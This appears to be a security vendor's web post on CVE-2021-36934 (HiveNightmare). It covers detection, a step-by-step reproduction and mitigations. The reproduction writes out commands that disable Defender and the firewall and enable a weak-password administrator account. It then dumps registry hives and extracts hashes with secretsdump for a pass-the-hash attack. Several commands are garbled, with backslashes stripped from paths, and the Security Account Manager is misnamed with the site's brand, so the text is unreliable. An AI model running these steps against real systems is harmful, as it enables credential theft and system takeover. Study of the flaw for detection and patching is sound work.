提交需求
    *
    *

    *
    *
    *
    立即提交
    点击”立即提交”,表明我理解并同意 《黄金城科技隐私条款》

    logo

      产品与服务
      解决方案
      技术支持
      合作发展
      关于黄金城

      申请试用
        CVE-2021-36934: Windows特权提升漏洞复现
        发布时间:2021-08-20 阅读次数: 442 次

        漏洞概述


        CVE-2021-36934: Windows特权提升漏洞是由于Windows对多个系统文件(包括黄金城官网账户管理器(SAM))的访问控制列表(ACL)过于宽松所导致的特权提升漏洞。成功利用此漏洞的攻击者可以将普通用户权限提升至SYSTEM权限,并在目标机器上执行任意代码,从而达到控制目标系统的目的。但该漏洞需要开启系统保护,并设置系统还原点才可利用。


        影响版本


        Microsoft:Windows10:1809及之后的版本


        漏洞检测方法


        执行以下命令:


        icacls C:windowssystem32configsam


        如果输出BUILTINUsers:(I)(RX) 表示该系统易受攻击。




        如果输出 Accessis denied 或拒绝访问表示该系统不易受攻击。




        漏洞复现


        1)环境配置


        启用administrator用户:net useradministrator /active:yes


        设置密码:net useradministrator 123456


        关闭Defender:


        reg add"HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows Defender" /v"DisableAntiSpyware" /d 1 /t REG_DWORD /f


        关闭防火墙:netsh advfirewallset allprofiles state off


        启用文件和打印机共享服务:net startlanmanserver




        2)创建系统还原点




        3)使用GossiTheDog提供的工具转储SAM,SYSTEM和SECURITY文件。


        工具地址:https://github.com/GossiTheDog/HiveNightmare




        可以看到在低权限账号下,成功利用CVE-2021–36934 读取到了 SAM、SECURITY、SYSTEM 三个文件。


        4)使用impacket-secretsdump工具获取目标用户的Hash 值


        git clonehttps:


        //github.com/SecureAuthCorp/impacket.gitcd impacket/examples


        cd impacket/examples


        python3 secretsdump.py -samSAM-2021-08-11 -system SYSTEM-2021-08-11 -security SECURITY-2021-08-11 LOCAL




        5)使用msf进行哈希传递攻击,利用SMB服务获取目标系统SYSTEM权限。




        6)成功获得system权限




        处置建议


        1)限制外部对%windir%system32config文件的访问:


        1.以管理员权限打开CMD或PowerShell


        2.运行该命令:icacls %windir%system32config*.*/inheritance:e


        2)删除卷影复制服务(VSS)副本:


        1.删除限制访问%windir%system32config之前存在的所有系统还原点和卷影


        2.创建一个新的系统还原点

        免费试用
        服务热线

        马上咨询

        400-811-3777

        回到顶部

        【网站地图】【sitemap】